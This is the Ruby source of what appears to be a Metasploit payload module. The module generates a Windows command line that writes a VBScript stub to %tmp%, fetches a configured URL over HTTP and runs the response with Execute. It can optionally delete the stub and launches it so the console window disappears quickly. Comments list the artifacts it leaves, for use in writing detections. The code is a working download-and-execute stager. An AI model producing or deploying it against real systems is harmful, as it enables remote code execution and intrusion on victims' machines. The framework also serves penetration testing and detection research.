Path: blob/master/modules/payloads/singles/cmd/windows/download_eval_vbs.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Single-stage Windows command payload. It emits one command line that writes
# a small VBScript stub into %tmp% and launches it. The stub fetches the
# configured URL and passes the response body to VBScript's Execute.
#
# Artifacts visible in the generated command (useful when writing detections):
#   * a .vbs file with a random 1-2 letter name created in %tmp% by an
#     `echo ... >file` redirect
#   * `start` launching that file, optionally through `wscript`
#   * the script creating a Microsoft.XMLHTTP object and issuing a GET
#   * with DELETE set, the stub removing its own file via
#     Scripting.FileSystemObject
module MetasploitModule
  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  # Registers the module metadata and the four datastore options read by
  # #command_string.
  #
  # @param info [Hash] metadata merged with this module's own entries
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Windows Executable Download and Evaluate VBS',
        'Description' => %q{
          Downloads a file from an HTTP(S) URL and executes it as a vbs script.
          Use it to stage a vbs encoded payload from a short command line.
        },
        'Author' => 'scriptjunkie',
        'License' => BSD_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_CMD,
        'Handler' => Msf::Handler::None,
        'Session' => Msf::Sessions::CommandShell,
        'PayloadType' => 'cmd',
        'RequiredCmd' => 'wscript',
        'Payload' => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
    )

    # URL is mandatory; the three booleans default to false.
    module_options = [
      OptString.new('URL', [ true, 'The pre-encoded URL to the script' ]),
      OptBool.new('INCLUDECMD', [ true, 'Include the cmd /q /c', false ]),
      OptBool.new('INCLUDEWSCRIPT', [ true, 'Include the wscript command', false ]),
      OptBool.new('DELETE', [ true, 'Delete created .vbs after download', false ])
    ]
    register_options(module_options)
  end

  # Returns the parent's generated payload with the command line appended.
  #
  # @param _opts [Hash] unused here
  # @return [String]
  def generate(_opts = {})
    super + command_string
  end

  # Assembles the command line from the datastore options.
  #
  # The URL option is interpolated verbatim between double quotes inside the
  # echoed script; nothing in this method escapes it, which is why the option
  # text asks for a pre-encoded value.
  #
  # @return [String] the complete command line
  def command_string
    # Keep variable names short.
    stub_name = Rex::Text.rand_text_alpha(1..2)
    http_var = Rex::Text.rand_text_alpha(1..2)
    stub_file = "#{stub_name}.vbs"

    segments = []
    segments << 'cmd.exe /q /c ' if datastore['INCLUDECMD']

    # The VBScript is a single line of ':'-separated statements written via echo.
    segments << "cd %tmp%&echo Set #{http_var}=CreateObject(\"Microsoft.XMLHTTP\"):"
    segments << "#{http_var}.Open \"GET\",\"#{datastore['URL']}\",False:"
    segments << "#{http_var}.Send:"
    segments << "Execute #{http_var}.responseText"

    # The optional self-delete statement is placed after Execute in the script.
    if datastore['DELETE']
      segments << ":CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{stub_file}\""
    end

    # "start <name>.vbs" instead of just "<name>.vbs" so that the console window
    # disappears quickly before the wscript libraries load and the file downloads
    segments << " >#{stub_file}&start "
    segments << 'wscript ' if datastore['INCLUDEWSCRIPT']
    segments << stub_file

    segments.join
  end
end